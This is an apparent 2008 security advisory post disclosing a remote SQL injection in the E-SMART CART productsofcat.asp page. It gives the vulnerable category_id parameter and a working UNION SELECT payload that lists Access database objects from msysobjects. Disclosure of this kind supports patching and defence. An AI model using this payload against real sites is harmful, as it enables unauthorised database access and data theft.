Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Muitiple XSS - Glassfish Web Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )

PHP JOBWEBSITE PRO (JobSearch3. php) SQL Injection Vulnerability

[ECHO_ADV_98$2008] Pre Ads Portal <= 2.0 Sql Injection Vulnerability

[ECHO_ADV_97$2008] Pre News Manager <= 1.0 (index.php id) Sql Injection Vulnerability

From:	Jose Luis Góngora Fernández <sys-project_(at)_hotmail.com>
Date:	16.06.2008
Subject:	E-SMART CART (productsofcat.asp) Remote SQL Injection Vulnerability

[+] Info:

[~] Bug found by Jose Luis Góngora Fernández (JosS)
[~] sys-project[at]hotmail.com
[~] http://www.spanish-hackers.com/
[~] Spanish Hackers Team - [SHT]
[~] EspSeC & Hack0wn!.

[~] Software: E-SMART CART (payment)
[~] HomePage: http://www.preproject.com/
[~] Exploit: Remote SQL Injection [High]
[~] Vuln file: productsofcat.asp

[~] /store/productsofcat.asp?p=1&category_id=[SQL]

[+] Exploit:

[~] http://localhost/PATH/store/productsofcat.asp?p=1&category_id=[SQL]
[~] 22+and+1=2+union+all+select+1,name,3,0+from+msysobjects

* In memory of rgod